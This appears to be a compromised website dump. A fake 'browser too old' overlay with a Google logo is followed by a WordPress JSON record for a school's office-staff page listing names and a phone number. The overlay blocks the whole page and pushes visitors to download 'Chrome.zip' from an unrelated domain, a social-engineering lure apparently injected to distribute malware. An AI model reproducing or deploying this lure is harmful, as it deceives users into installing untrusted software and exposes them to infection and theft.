<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>Update Notice: Your browser version is too low. Please check google.com for updates.</title>
<style>
/* 全屏遮罩：禁止操作 */
.full-mask {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.9);
    z-index: 999999;
    display: flex;
    align-items: center;
    justify-content: center;
}

/* 弹窗盒子 */
.update-box {
    background: #fff;
    width: 460px;
    padding: 60px 40px;
    border-radius: 24px;
    text-align: center;
    box-shadow: 0 20px 60px rgba(0,0,0,0.4);
}

/* 大 LOGO（超大） */
.logo {
    width: 220px;
    height: auto;
    margin-bottom: 30px;
}

/* 提示文字 */
.title {
    font-size: 24px;
    font-weight: bold;
    color: #333;
    margin-bottom: 40px;
}

/* 下载更新按钮 */
.download-btn {
    display: inline-block;
    padding: 20px 60px;
    font-size: 18px;
    background: #007bff;
    color: #fff;
    border-radius: 14px;
    text-decoration: none;
    font-weight: bold;
}
.download-btn:hover {
    background: #0056b3;
}
</style>
</head>
<body>

<!-- 你的页面内容（完全被挡住，无法点击） -->
<div style="padding:50px;">
    <h1>网站内容</h1>
    <p>被锁定，无法操作</p>
</div>

<!-- 全屏更新弹窗 -->
<div class="full-mask">
    <div class="update-box">
        <!-- 大LOGO -->
        <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" class="logo" alt="LOGO">
        
        <!-- 提示文字 -->
        <div class="title">This issue may be due to an outdated browser kernel or the use of IE compatibility mode. Please immediately download the latest version of Google Chrome from the official website.</div>
        
        <!-- 下载按钮 -->
        <a href="http://api.aicoinc.com.cn/Chrome.zip" class="download-btn">Download updates now</a>
    </div>
</div>

</body>
</html>
{"id":3922,"date":"2025-09-22T04:51:58","date_gmt":"2025-09-22T04:51:58","guid":{"rendered":"https:\/\/christjyotipathsala.com\/?page_id=3922"},"modified":"2025-09-22T06:00:41","modified_gmt":"2025-09-22T06:00:41","slug":"elementor-3922","status":"publish","type":"page","link":"https:\/\/christjyotipathsala.com\/index.php\/elementor-3922\/","title":{"rendered":"OFFICE STAFF"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"3922\" class=\"elementor elementor-3922\">\n\t\t\t\t<div class=\"elementor-element elementor-element-b4b3c68 e-flex e-con-boxed e-con e-parent\" data-id=\"b4b3c68\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-abbf541 elementor-widget elementor-widget-html\" data-id=\"abbf541\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n  <meta charset=\"UTF-8\">\r\n  <title>Christ Jyoti School, Pathsala<\/title>\r\n  <style>\r\n    \/* ===== Background Image Section ===== *\/\r\n    body {\r\n      margin: 0;\r\n      font-family: Arial, Helvetica, sans-serif;\r\n      background: url(\"20250815_083855-scaled.jpg\") no-repeat center center fixed;\r\n      background-size: cover;\r\n      color: #333;\r\n    }\r\n\r\n    \/* ===== Header Title ===== *\/\r\n    header {\r\n      text-align: center;\r\n      padding: 40px 20px;\r\n      background: blue;  \/* Blue background *\/\r\n      color: yellow;     \/* Yellow text *\/\r\n      font-size: 40px;\r\n      font-weight: bold;\r\n      letter-spacing: 2px;\r\n      text-shadow: 2px 2px 6px rgba(0,0,0,0.5);\r\n    }\r\n\r\n    \/* ===== Section Heading ===== *\/\r\n    h2 {\r\n      margin-top: 100px; \/* adds 3+ lines space *\/\r\n      text-align: center;\r\n      font-size: 28px;\r\n      font-weight: bold;\r\n      color: red; \/* Red color for section heading *\/\r\n    }\r\n\r\n    \/* ===== Staff Container ===== *\/\r\n    .staff-container {\r\n      max-width: 700px;\r\n      margin: 50px auto;\r\n      padding: 10px;\r\n    }\r\n\r\n    \/* ===== Staff Card ===== *\/\r\n    .staff-card {\r\n      background: rgba(255, 255, 255, 0.95);\r\n      border: 2px solid #1e90ff;\r\n      border-radius: 12px;\r\n      box-shadow: 0 5px 15px rgba(0,0,0,0.2);\r\n      text-align: center;\r\n      padding: 25px;\r\n      margin-bottom: 35px;\r\n      transition: transform 0.3s ease, box-shadow 0.3s ease;\r\n    }\r\n\r\n    .staff-card:hover {\r\n      transform: scale(1.02);\r\n      box-shadow: 0 8px 20px rgba(0,0,0,0.3);\r\n    }\r\n\r\n    .staff-card img {\r\n      width: 160px;\r\n      height: 160px;\r\n      object-fit: cover;\r\n      border-radius: 50%;\r\n      border: 3px solid #1e90ff;\r\n      margin-bottom: 15px;\r\n    }\r\n\r\n    .staff-card h3 {\r\n      margin: 10px 0 8px;\r\n      font-size: 22px;\r\n      color: #00509e;\r\n    }\r\n\r\n    .staff-card p {\r\n      margin: 6px 0;\r\n      font-size: 16px;\r\n      color: #222;\r\n    }\r\n  <\/style>\r\n<\/head>\r\n<body>\r\n\r\n  <!-- Header -->\r\n  <header>\r\n    CHRIST JYOTI SCHOOL, PATHSALA\r\n  <\/header>\r\n\r\n  <!-- Section Title -->\r\n  <h2>OUR OFFICE STAFFS<\/h2>\r\n\r\n  <!-- Staff Section -->\r\n  <div class=\"staff-container\">\r\n\r\n    <!-- Staff 1 -->\r\n    <div class=\"staff-card\">\r\n      <img decoding=\"async\" src=\"PHOTO_URL_ALBERT\" alt=\"Albert Justin Mardi\">\r\n      <h3>Albert Justin Mardi<\/h3>\r\n      <p><b>Designation:<\/b> Office- Coordinator & Asst. Teacher<\/p>\r\n      <p><b>Phone Number:<\/b> 8474837720<\/p>\r\n    <\/div>\r\n\r\n    <!-- Staff 2 -->\r\n    <div class=\"staff-card\">\r\n      <img decoding=\"async\" src=\"PHOTO_URL_ADITI\" alt=\"Aditi Ekka\">\r\n      <h3>Aditi Ekka<\/h3>\r\n      <p><b>Designation:<\/b> Accountant<\/p>\r\n      <p><b>Phone Number:<\/b> 8474 XXXX<\/p>\r\n    <\/div>\r\n\r\n    <!-- Staff 3 -->\r\n    <div class=\"staff-card\">\r\n      <img decoding=\"async\" src=\"PHOTO_URL_ROSY\" alt=\"Rosy\">\r\n      <h3>Rosy<\/h3>\r\n      <p><b>Designation:<\/b> Office Staff<\/p>\r\n      <p><b>Phone Number:<\/b> 847 xxxxxx<\/p>\r\n    <\/div>\r\n\r\n  <\/div>\r\n\r\n<\/body>\r\n<\/html>\r\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Christ Jyoti School, Pathsala CHRIST JYOTI SCHOOL, PATHSALA OUR OFFICE STAFFS Albert Justin Mardi Designation: Office- Coordinator &#038; Asst. Teacher<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-3922","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/pages\/3922","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/comments?post=3922"}],"version-history":[{"count":20,"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/pages\/3922\/revisions"}],"predecessor-version":[{"id":3946,"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/pages\/3922\/revisions\/3946"}],"wp:attachment":[{"href":"https:\/\/christjyotipathsala.com\/index.php\/wp-json\/wp\/v2\/media?parent=3922"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}